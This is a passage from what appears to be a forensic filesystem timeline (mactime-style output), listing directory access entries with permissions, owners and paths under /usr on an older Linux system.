                       4096 .a. drwxr-xr-x root     root     /usr/lib/metamail

                       4096 .a. drwxr-xr-x root     root     /usr/lib/metamail/fonts

                       4096 .a. drwxr-xr-x root     root     /usr/lib/mpage

                       4096 .a. drwxr-xr-x root     root     /usr/lib/nmh

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/B

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/CGI

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/CPAN

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Class

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Data

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Devel

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/ExtUtils

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/File

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/File/Spec

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Getopt

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/I18N

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/IPC

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Math

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Net

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Pod

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Search

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Sys

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Term

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Test

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Text

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Tie

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/Time

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/User

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/auto

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/auto/Getopt

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/auto/Getopt/Long

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/B

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/CORE

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/IO

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/arpa

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/asm

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/B

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/DB_File

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/Data

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/Data/Dumper

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/DynaLoader

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/Fcntl

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/GDBM_File

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/IO

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/IPC

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/IPC/SysV

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/NDBM_File

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/Opcode

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/POSIX

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/SDBM_File

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/Socket

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/attrs

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/re

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/auto/sdbm

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/bits

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/db1

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/et

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/ext2fs

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/gdbm

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/gnu

                       8192 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/linux

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/ncurses

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/net

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/netash

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/netatalk

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/netax25

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/neteconet

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/netinet

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/netipx

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/netpacket

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/netrom

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/netrose

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/nfs

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/protocols

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/pwdb

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/rpc

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/rpcsvc

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/rpm

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/scsi

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/security

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/ss

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/sys

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/i386-linux/uuid

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/man

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/man/man3

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/5.00503/pod

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/Text

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/man

                       8192 .a. drwxr-xr-x root     root     /usr/lib/perl5/man/man3

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/site_perl

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/site_perl/5.005

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/site_perl/5.005/i386-linux

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/site_perl/5.005/i386-linux/Apache

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/site_perl/5.005/i386-linux/Apache/Constants

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/site_perl/5.005/i386-linux/Bundle

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/site_perl/5.005/i386-linux/auto

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/site_perl/5.005/i386-linux/auto/Apache

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/site_perl/5.005/i386-linux/auto/Apache/Leak

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/site_perl/5.005/i386-linux/auto/Apache/Symbol

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/site_perl/5.005/i386-linux/auto/MD5

                       4096 .a. drwxr-xr-x root     root     /usr/lib/perl5/site_perl/5.005/i386-linux/auto/mod_perl

                       4096 .a. drwxr-xr-x root     root     /usr/lib/pgsql

                       4096 .a. drwx------ postgres postgres /usr/lib/pgsql/backup

                       4096 .a. drwxr-xr-x root     root     /usr/lib/pmake

                      12288 .a. drwxrwxr-x root     root     /usr/lib/python1.5

                       4096 .a. drwxr-xr-x root     root     /usr/lib/python1.5/lib-dynload

                       4096 .a. drwxrwxr-x root     root     /usr/lib/python1.5/lib-stdwin

                       4096 .a. drwxrwxr-x root     root     /usr/lib/python1.5/plat-linux-i386

                       4096 .a. drwxr-xr-x root     root     /usr/lib/rhs

                       4096 .a. drwxr-xr-x root     root     /usr/lib/rhs/rhs-printfilters

                       4096 .a. drwxr-xr-x root     root     /usr/lib/rpm

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/SGMLTools

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/dist

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/dist/sgmltool

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/dist/sgmltool/groff

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/dist/sgmltool/html

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/dist/sgmltool/info

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/dist/sgmltool/latex

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/dist/sgmltool/latex2e

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/dist/sgmltool/latin1

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/dist/sgmltool/lyx

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/dist/sgmltool/man

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/dist/sgmltool/rtf

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/dtd

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/icons

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml-tools/site

                       4096 .a. drwxr-xr-x root     root     /usr/lib/sgml/iso-entities-8879.1986

                       4096 .a. drwxr-xr-x root     root     /usr/lib/slrn

                       4096 .a. drwxr-xr-x root     root     /usr/lib/trn

                       4096 .a. drwxr-xr-x root     root     /usr/lib/uucp

                      16384 .a. drwxr-xr-x root     root     /usr/lost+found

Nov 08 00 02:02:04     4096 .a. drwxr-xr-x root     root     /usr/X11R6

                       4096 .a. drwxr-xr-x root     root     /usr/X11R6/doc

                       4096 .a. drwxr-xr-x root     root     /usr/X11R6/include

                       4096 .a. drwxr-xr-x root     root     /usr/X11R6/lib/X11

                       4096 .a. drwxr-xr-x root     root     /usr/X11R6/man

                       4096 .a. drwxr-xr-x root     root     /usr/X11R6/man/man1

                       4096 .a. drwxrwxr-x news     news     /usr/bin/auth

                       4096 .a. drwxrwxr-x news     news     /usr/bin/control

                       4096 .a. drwxrwxr-x news     news     /usr/bin/filter

                       4096 .a. drwxrwxr-x news     news     /usr/bin/rnews.libexec

                       4096 .a. drwxr-xr-x root     root     /usr/dict

                       4096 .a. drwxr-xr-x root     root     /usr/include/arpa

                       4096 .a. drwxr-xr-x root     root     /usr/include/bits

                       4096 .a. drwxr-xr-x root     root     /usr/include/db1

                       4096 .a. drwxr-xr-x root     root     /usr/include/g++-2

                       4096 .a. drwxr-xr-x root     root     /usr/include/g++-2/std

                       4096 .a. drwxr-xr-x root     root     /usr/include/gdbm

                       4096 .a. drwxr-xr-x root     root     /usr/include/gnu

                       4096 .a. drwxr-xr-x root     root     /usr/include/kudzu

                       4096 .a. drwxr-xr-x root     root     /usr/include/linuxconf

                       4096 .a. drwxr-xr-x root     root     /usr/include/linuxconf/module_apis

                       4096 .a. drwxr-xr-x root     root     /usr/include/ncurses

                       4096 .a. drwxr-xr-x root     root     /usr/include/net

                       4096 .a. drwxr-xr-x root     root     /usr/include/netash

                       4096 .a. drwxr-xr-x root     root     /usr/include/netatalk

                       4096 .a. drwxr-xr-x root     root     /usr/include/netax25

                       4096 .a. drwxr-xr-x root     root     /usr/include/neteconet

                       4096 .a. drwxr-xr-x root     root     /usr/include/netinet

                       4096 .a. drwxr-xr-x root     root     /usr/include/netipx

                       4096 .a. drwxr-xr-x root     root     /usr/include/netpacket

                       4096 .a. drwxr-xr-x root     root     /usr/include/netrom

                       4096 .a. drwxr-xr-x root     root     /usr/include/netrose

                       4096 .a. drwxr-xr-x root     root     /usr/include/nfs

                       4096 .a. drwxr-xr-x root     root     /usr/include/pci

                       4096 .a. drwxr-xr-x root     root     /usr/include/pgsql

                       4096 .a. drwxr-xr-x root     root     /usr/include/pgsql/access

                       4096 .a. drwx------ root     root     /usr/include/pgsql/catalog

                       4096 .a. drwxr-xr-x root     root     /usr/include/pgsql/commands

                       4096 .a. drwxr-xr-x root     root     /usr/include/pgsql/executor

                       4096 .a. drwxr-xr-x root     root     /usr/include/pgsql/iodbc

                       4096 .a. drwxr-xr-x root     root     /usr/include/pgsql/lib

                       4096 .a. drwxr-xr-x root     root     /usr/include/pgsql/libpq

                       4096 .a. drwxr-xr-x root     root     /usr/include/pgsql/libpq++

                       4096 .a. drwx------ root     root     /usr/include/pgsql/nodes

                       4096 .a. drwx------ root     root     /usr/include/pgsql/parser

                       4096 .a. drwxr-xr-x root     root     /usr/include/pgsql/port

                       4096 .a. drwxr-xr-x root     root     /usr/include/pgsql/port/linux

                       4096 .a. drwx------ root     root     /usr/include/pgsql/rewrite

                       4096 .a. drwx------ root     root     /usr/include/pgsql/storage

                       4096 .a. drwx------ root     root     /usr/include/pgsql/tcop

                       4096 .a. drwxr-xr-x root     root     /usr/include/pgsql/utils

                       4096 .a. drwxr-xr-x root     root     /usr/include/protocols

                       4096 .a. drwxr-xr-x root     root     /usr/include/pwdb

                       4096 .a. drwxr-xr-x root     root     /usr/include/readline

                       4096 .a. drwxr-xr-x root     root     /usr/include/rpc

                       4096 .a. drwxr-xr-x root     root     /usr/include/rpcsvc

                       4096 .a. drwxr-xr-x root     root     /usr/include/rpm

                       4096 .a. drwxr-xr-x root     root     /usr/include/scsi

                       4096 .a. drwxr-xr-x root     root     /usr/include/security

                       4096 .a. drwxr-xr-x root     root     /usr/include/slang

                       4096 .a. drwxr-xr-x root     root     /usr/include/sp

                       4096 .a. drwxr-xr-x root     root     /usr/include/sp/generic

                       4096 .a. drwxr-xr-x root     root     /usr/include/sp/include

                       4096 .a. drwxr-xr-x root     root     /usr/include/sp/lib

                       4096 .a. drwxr-xr-x root     root     /usr/include/sys

                       8192 .a. drwxr-xr-x root     root     /usr/info

                       4096 .a. drwxr-xr-x root     root     /usr/local/doc

                       4096 .a. drwxr-xr-x root     root     /usr/local/info

                       4096 .a. drwxr-xr-x root     root     /usr/local/man

                       4096 .a. drwxr-xr-x root     root     /usr/local/man/man1

                       4096 .a. drwxr-xr-x root     root     /usr/local/man/man2

                       4096 .a. drwxr-xr-x root     root     /usr/local/man/man3

                       4096 .a. drwxr-xr-x root     root     /usr/local/man/man4

                       4096 .a. drwxr-xr-x root     root     /usr/local/man/man5

                       4096 .a. drwxr-xr-x root     root     /usr/local/man/man6

                       4096 .a. drwxr-xr-x root     root     /usr/local/man/man7

                       4096 .a. drwxr-xr-x root     root     /usr/local/man/man8

                       4096 .a. drwxr-xr-x root     root     /usr/local/man/man9

                       4096 .a. drwxr-xr-x root     root     /usr/local/man/mann

                       4096 .a. drwxr-xr-x root     root     /usr/local/src

                       4096 .a. drwxr-xr-x root     root     /usr/share/aclocal

                       4096 .a. drwxr-xr-x root     root     /usr/share/autoconf

                       4096 .a. drwxr-xr-x root     root     /usr/share/automake

                       4096 .a. drwxr-xr-x root     root     /usr/share/awk

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/etc

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/etc/e

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/leim

                       8192 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/lisp

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/lisp/calendar

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/lisp/emacs-lisp

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/lisp/emulation

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/lisp/gnus

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/lisp/international

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/lisp/language

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/lisp/mail

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/lisp/play

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/lisp/progmodes

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/lisp/term

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/lisp/textmodes

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/20.5/site-lisp

                       4096 .a. drwxr-xr-x root     root     /usr/share/emacs/site-lisp

                       4096 .a. drwxr-xr-x root     root     /usr/share/fonts

                       4096 .a. drwxr-xr-x root     root     /usr/share/fonts/default

                       4096 .a. drwxr-xr-x root     root     /usr/share/fonts/default/Type1

                       4096 .a. drwxr-xr-x root     root     /usr/share/fonts/default/ghostscript

                       4096 .a. drwxr-xr-x root     root     /usr/share/gettext

                       4096 .a. drwxr-xr-x root     root     /usr/share/gettext/intl

                       4096 .a. drwxr-xr-x root     root     /usr/share/gettext/po

                       4096 .a. drwxr-xr-x root     root     /usr/share/ghostscript

                       4096 .a. drwxr-xr-x root     root     /usr/share/ghostscript/5.50

                       4096 .a. drwxr-xr-x root     root     /usr/share/ghostscript/5.50/examples

                       4096 .a. drwxr-xr-x root     root     /usr/share/git

                       4096 .a. drwxr-xr-x root     root     /usr/share/gnupg

                       4096 .a. drwxr-xr-x root     root     /usr/share/i18n

                       4096 .a. drwxr-xr-x root     root     /usr/share/i18n/charmaps

                       4096 .a. drwxr-xr-x root     root     /usr/share/i18n/locales

                       4096 .a. drwxr-xr-x root     root     /usr/share/i18n/repertoiremaps

                       4096 .a. drwxr-xr-x root     root     /usr/share/kudzu

                       4096 .a. drwxr-xr-x root     root     /usr/share/libtool

                       4096 .a. drwxr-xr-x root     root     /usr/share/libtool/libltdl

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/af_ZA

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/af_ZA/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ar_SA

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ar_SA/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ca_ES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ca_ES/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/cs

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/cs/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/cs_CZ

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/cs_CZ/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/da

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/da/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/da_DK

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/da_DK/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/de

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/de/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/de_AT

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/de_AT/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/de_BE

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/de_BE/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/de_CH

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/de_CH/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/de_DE

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/de_DE/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/de_LU

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/de_LU/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/el

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/el/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/el_GR

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/el_GR/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_AU

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_AU/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_BW

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_BW/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_CA

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_CA/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_DK

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_DK/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_GB

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_GB/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_IE

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_IE/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_US

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_US/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_ZW

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/en_ZW/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/eo

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/eo/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/es

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/es/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/es_ES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/es_ES/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/et

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/et/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/et_EE

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/et_EE/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/eu_ES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/eu_ES/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fi

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fi/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fi_FI

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fi_FI/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fo_FO

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fo_FO/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fr

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fr/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fr_BE

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fr_BE/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fr_CA

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fr_CA/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fr_CH

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fr_CH/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fr_FR

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fr_FR/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fr_LU

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/fr_LU/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ga_IE

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ga_IE/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/gl

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/gl/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/gl_ES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/gl_ES/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/hr_HR

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/hr_HR/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/hu

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/hu/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/hu_HU

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/hu_HU/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/id

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/id/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/in_ID

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/in_ID/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/is

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/is/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/is_IS

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/is_IS/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/it

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/it/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/it_CH

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/it_CH/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/it_IT

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/it_IT/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/iw_IL

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/iw_IL/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ja

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ja/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/kl_GL

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/kl_GL/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ko

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ko/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/lt_LT

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/lt_LT/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/lv_LV

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/lv_LV/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/mk_MK

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/mk_MK/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/nl

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/nl/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/nl_BE

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/nl_BE/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/nl_NL

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/nl_NL/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/no

